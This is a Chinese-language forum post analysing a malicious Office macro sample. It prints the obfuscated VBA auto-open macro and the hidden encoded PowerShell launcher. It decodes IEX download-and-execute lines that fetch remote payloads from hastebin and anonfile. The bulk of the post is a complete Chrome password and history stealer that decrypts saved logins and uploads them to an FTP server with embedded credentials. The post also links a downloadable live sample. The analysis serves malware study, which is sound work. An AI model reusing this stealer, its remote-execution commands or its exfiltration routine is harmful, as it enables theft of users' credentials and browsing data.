cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA = cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA + " "
"cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc =
cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA = cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA + "A"
Shell cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA, vbHide
End Sub
Sub AutoOpen()
auto_open
End Sub
Sub Workbook_Open()
auto_open
End Sub
基本上混淆不严重,一眼就看出来了比较好处理,写个人脚本过滤一下就行,当然还是有捷径的
[Asm] 纯文本查看 复制代码
PoWeRsHeLL.ExE -NoP -W HiDdEn -ExEc ByPaSs -NoNI -enc SQBFAFgAIAAoAE4AZQBXAC0ATwBiAEoAZQBDAHQAIABOAGUAdAAuAFcAZQBCAEMAbABJAGUATgB0ACkALgBEAG8AVwBuAEwAbwBBAGQAUwB0AFIAaQBOAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBoAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AZQBmAHUAaABpAGgAZQBuAGUAZgAnACkA
// 处理过的要执行的命令
IEX (NeW-ObJeCt Net.WeBClIeNt).DoWnLoAdStRiNg('https://hastebin.com/raw/efuhihenef') // -enc 后面跟着的base64加密解密后的数据
捷径就是认出前面几个字符是 powershell.exe 后火绒剑添加一下就好了·
下载地址其中要下载并执行的页面数据
处理过后,就是判断浏览器版本根据不同的版本执行不同页面中的命令
[Asm] 纯文本查看 复制代码
$major = [environment]::OSVersion.Version.Major;$menor = [environment]::OSVersion.Version.Minor;
$version = ("$major.$menor");
try
{
if($version = "10.0")
{"ejecutando 10.0";IEX (New-Object Net.WebClient).DownloadString('https://hastebin.com/raw/sukeveriho');}
else
{
if($version = "6.3")
{"ejecutando 6.3";IEX (New-Object Net.WebClient).DownloadString('https://hastebin.com/raw/sukeveriho');}
else
{
if($version = "6.2")
{"ejecutando 6.2";IEX (New-Object Net.WebClient).DownloadString('https://hastebin.com/raw/sukeveriho');}
else
{
if($version = "6.1")
{
"ejecutando 6.1";
$url="https://cdn-24.anonfile.com/A4v6P483n0/2c3d559f-1571620269/2.txt";
$path="$env:temp\222.txt";
(New-Object Net.WebClient).DownloadFile($url, $path);IEX (New-Object Net.WebClient).DownloadString($path);
}
else{}
}
}
};
}
catch{};
exit
重点看6.1版本的吧,因为它大,,, txt中还包含着一个1M多的base加密数据,代码也很直白,就是盗取浏览器的数据库信息
[Bash shell] 纯文本查看 复制代码
try
{
TASKKILL /F /IM chrome.exe /T
}
catch
{
}
Start-Sleep -Seconds 3 Function Get-ChromeDump
{
[CmdletBinding()]param([Parameter(Mandatory = False)]OutFile = "env:temp\1.txt");
Add-Type -Assembly System.Security;
if(([System.Security.Principal.WindowsIdentity]::GetCurrent()).IsSystem)
{
Write-Warning "Unable to decrypt passwords contained in Login Data file as SYSTEM."; //无法将登录数据文件中包含的密码作为系统解密。
NoPasswords = True;
}
;
if([IntPtr]::Size -eq 8)
{
}
else{
assembly = [数据文件];
Write-Verbose "[+]System.Data.SQLite.dll will be written to disk";
content = [System.Convert]::FromBase64String(assembly);
assemblyPath = "(env:LOCALAPPDATA)\System.Data.SQLite.dll";
if(Test-path assemblyPath){
try{
Add-Type -Path assemblyPath;
}
catch{
Write-Warning "Unable to load SQLite assembly"; //无法加载SQLite数据库
break;
}
}
else{ //用解密出来的DLL将SQLite数据加载
[System.IO.File]::WriteAllBytes(assemblyPath,content);
Write-Verbose "[+]Assembly for SQLite written to assemblyPath";
try{
Add-Type -Path assemblyPath;
}
catch{
Write-Warning "Unable to load SQLite assembly";
break;
}
;
}
;
if(Get-Process | Where-Object {_.Name -like "*chrome*"}) //判断是否是Chrome浏览器
{
Write-Warning "[+]Cannot parse Data files while chrome is running";
break;
}
;
OS = [environment]::OSVersion.Version; //判断浏览器版本
if(OS.Major -ge 6){
chromepath = "(env:LOCALAPPDATA)\Google\Chrome\User Data\Default"; //获取浏览器用户SQLite数据库路径
}
else{
chromepath = "(env:HOMEDRIVE)\(env:HOMEPATH)\Local Settings\Application Data\Google\Chrome\User Data\Default";
}
;
if(!(Test-path chromepath)){
Throw "Chrome user data directory does not exist"; //数据库不存在
}
else{
if(Test-Path -Path "chromepath\Web Data"){
WebDatadb = "chromepath\Web Data" //web数据库
}
;
if(Test-Path -Path "chromepath\Login Data"){
loginDatadb = "chromepath\Login Data" //用户数据库
}
;
if(Test-Path -Path "chromepath\History"){
historydb = "chromepath\History" //登入历史数据库
}
;
}
;
if(!(NoPasswords)){ //查询密码处理
connStr = "Data Source=loginDatadb;Read Only=True; Version=3;";
connection = New-Object System.Data.SQLite.SQLiteConnection(connStr);
OpenConnection = connection.OpenAndReturn();
Write-Verbose "Opened DB file loginDatadb"; //用户数据库
query = "SELECT * FROM logins;"; //数据库查询
dataset = New-Object System.Data.DataSet;
dataAdapter = New-Object System.Data.SQLite.SQLiteDataAdapter(query,OpenConnection);
[void]dataAdapter.fill(dataset);
logins = @();
Write-Verbose "Parsing results of query query";
dataset.Tables | Select-Object -ExpandProperty Rows | ForEach-Object
{
encryptedBytes = _.password_value;
username = _.username_value;
url = _.action_url;
decryptedBytes = [Security.Cryptography.ProtectedData]::Unprotect(encryptedBytes, null, [Security.Cryptography.DataProtectionScope]::CurrentUser);
plaintext = [System.Text.Encoding]::ASCII.GetString(decryptedBytes); //解密字节
login = New-Object PSObject -Property @
{
URL = url;
PWD = plaintext;
User = username;
}
;
logins += login;
}
;
}
;
connString = "Data Source=historydb; Version=3;"; //切换数据库
connection = New-Object System.Data.SQLite.SQLiteConnection(connString);
Open = connection.OpenAndReturn();
Write-Verbose "Opened DB file historydb"; //浏览历史数据库
DataSet = New-Object System.Data.DataSet;
query = "SELECT * FROM urls;"; //
dataAdapter = New-Object System.Data.SQLite.SQLiteDataAdapter(query,Open);
[void]dataAdapter.fill(DataSet);
History = @();
dataset.Tables | Select-Object -ExpandProperty Rows | ForEach-Object
{
HistoryInfo = New-Object PSObject -Property @
{
Title = _.title;
URL = _.url;
}
;
History += HistoryInfo;
}
;
if(!(OutFile)){ //OutFile 输出到文件temp\1.txt
"CHROME PASSWORDS`n";
logins | Format-Table URL,User,PWD -AutoSize;
"CHROME HISTORY`n";
History | Format-List Title,URL;
}
else {
"LOGINS`n" | Out-File OutFile;
logins | Out-File OutFile -Append;
"HISTORY`n" | Out-File OutFile -Append;
History | Out-File OutFile -Append;
}
;
Write-Warning "[!] Please remove SQLite assembly from here: assemblyPath";
}
;
function rtp{
Date = Get-Date -format d.M.yyyy;
Hour = Get-Date -format HH.mm.ss;
user = env:USERNAME;
Entropy = Get-Random -maximum 9999999;
tof = Date+"-"+Hour+"-"+user+"-"+Entropy+".txt";
File = "env:temp\1.txt";
ftp = "ftp://kakuzo:g3d0m4z08@files.000webhost.com/USERS/tof"; //上传至ftp文件夹
webclient = New-Object -TypeName System.Net.WebClient;
uri = New-Object -TypeName System.Uri -ArgumentList ftp;
webclient.UploadFile(uri, File);
}
Get-ChromeDump rtp
至此样本已经一目了然了,主要功能就是盗取用户浏览器的数据信息,发送到ftp服务器上,就是我这个彩笔第一次见,我一开始就认为大头在加密的数据,然而它里面的大量base64加密后的数据解密后发现是一个其名为System.Data.SQLite.dll 是一个官方无害无毒善良的dll 主要用来处理SQLite数据库,有点大材小用。。
样本除了宏代码容易被检查出来外,其它行为没有文件落地,在用户打开的文档后及其难发现自己已经中招。
上一张检测图
需要玩的可以自己下
链接:https://pan.baidu.com/s/1t6AYVz-eFrAh_DOXmqm70Q 提取码:xvuj 复制这段内容后打开百度网盘手机App,操作更方便哦 infected
如有错误,还望指正,彩笔感激不尽!!!! | 
[复制链接]
发表于 2019-11-13 12:52
|
发表于 2019-11-13 12:58
